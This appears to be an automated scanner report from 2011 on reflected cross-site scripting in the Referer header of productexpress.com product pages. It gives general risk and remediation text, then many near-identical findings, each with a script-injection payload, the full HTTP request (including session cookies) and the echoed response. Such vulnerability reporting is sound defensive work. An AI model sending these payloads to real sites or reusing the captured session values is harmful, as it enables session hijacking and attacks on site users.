Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55fbc"><script>alert(1)</script>f608c632517 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /ed-hardy-eh1206/301131 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660; Referer: http://www.google.com/search?hl=en&q=55fbc"><script>alert(1)</script>f608c632517
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:42 GMT Server: Apache Set-Cookie: JSESSIONID=A064556B47CBE52E8116938A1F7C57F7; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ed Ha ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=55fbc"><script>alert(1)</script>f608c632517" class="backLink2"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46980"><script>alert(1)</script>15805547840 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /ed-hardy-eh1206/301131/643692 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660; Referer: http://www.google.com/search?hl=en&q=46980"><script>alert(1)</script>15805547840
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:42 GMT Server: Apache Set-Cookie: JSESSIONID=001F5FBC817AD0CD00F9EBED40FFF572; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ed Ha ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=46980"><script>alert(1)</script>15805547840" class="backLink2"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76949"><script>alert(1)</script>50bd7c38c5e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /ed-hardy-eh1206/301131/643693 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660; Referer: http://www.google.com/search?hl=en&q=76949"><script>alert(1)</script>50bd7c38c5e
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:43 GMT Server: Apache Set-Cookie: JSESSIONID=B61F857D529ECD31EF9B79F828E21DC2; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ed Ha ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=76949"><script>alert(1)</script>50bd7c38c5e" class="backLink2"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12be5"><script>alert(1)</script>f0586d3b2d0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /hugo-boss-baxter-belt/195604 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660; Referer: http://www.google.com/search?hl=en&q=12be5"><script>alert(1)</script>f0586d3b2d0
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:38 GMT Server: Apache Set-Cookie: JSESSIONID=080FD89F8B369D16BF8C2084F5F3BC80; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=12be5"><script>alert(1)</script>f0586d3b2d0" class="backLink2"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5a1b"><script>alert(1)</script>86d7e15e56d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /hugo-boss-baxter-belt/195604/436031 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660; Referer: http://www.google.com/search?hl=en&q=d5a1b"><script>alert(1)</script>86d7e15e56d
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:38 GMT Server: Apache Set-Cookie: JSESSIONID=E777A294C6391EF5ED8FB692060BA66B; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=d5a1b"><script>alert(1)</script>86d7e15e56d" class="backLink2"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c841"><script>alert(1)</script>f0ae874b91 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /hugo-boss-benson-belt/195607 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660; Referer: http://www.google.com/search?hl=en&q=9c841"><script>alert(1)</script>f0ae874b91
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:38 GMT Server: Apache Set-Cookie: JSESSIONID=6AC1BB7B28EF22D539B9103A6492C9E5; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=9c841"><script>alert(1)</script>f0ae874b91" class="backLink2"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c171b"><script>alert(1)</script>365e299958 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /hugo-boss-benson-belt/195607/436036 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660; Referer: http://www.google.com/search?hl=en&q=c171b"><script>alert(1)</script>365e299958
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:38 GMT Server: Apache Set-Cookie: JSESSIONID=ED724FE9910151A2147FD554610004BD; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=c171b"><script>alert(1)</script>365e299958" class="backLink2"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66dfd"><script>alert(1)</script>501474615fb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /hugo-boss-bud-belt/195605 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660; Referer: http://www.google.com/search?hl=en&q=66dfd"><script>alert(1)</script>501474615fb
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:38 GMT Server: Apache Set-Cookie: JSESSIONID=3A1A6C9086C7053C17DB88FE6405DFB6; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=66dfd"><script>alert(1)</script>501474615fb" class="backLink2"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b203"><script>alert(1)</script>7d6da14198a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8bc8"><script>alert(1)</script>1b04d43b7e1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /hugo-boss-bud-belt/195605/436033 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660; Referer: http://www.google.com/search?hl=en&q=a8bc8"><script>alert(1)</script>1b04d43b7e1
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:38 GMT Server: Apache Set-Cookie: JSESSIONID=FD538F7F5A6D4129B3D7335422D0947C; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=a8bc8"><script>alert(1)</script>1b04d43b7e1" class="backLink2"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ca7a"><script>alert(1)</script>ae42cef81b9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /remo-tulliani-teju/177961 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660; Referer: http://www.google.com/search?hl=en&q=8ca7a"><script>alert(1)</script>ae42cef81b9
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:41 GMT Server: Apache Set-Cookie: JSESSIONID=A615B97D23CECFE85AB15C53A10870BB; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Remo ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=8ca7a"><script>alert(1)</script>ae42cef81b9" class="backLink2"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a350f"><script>alert(1)</script>d7492923167 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /remo-tulliani-teju/177961/401476 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660; Referer: http://www.google.com/search?hl=en&q=a350f"><script>alert(1)</script>d7492923167
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:42 GMT Server: Apache Set-Cookie: JSESSIONID=EF7E25D6C675970ADB4C1A3FD613CE79; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Remo ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=a350f"><script>alert(1)</script>d7492923167" class="backLink2"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa342"><script>alert(1)</script>8fbc8b2d053 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /remo-tulliani-teju/177961/401477 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660; Referer: http://www.google.com/search?hl=en&q=fa342"><script>alert(1)</script>8fbc8b2d053
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:41 GMT Server: Apache Set-Cookie: JSESSIONID=EF41AE6F32AEADB5AFF5B140DB4F5EA2; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
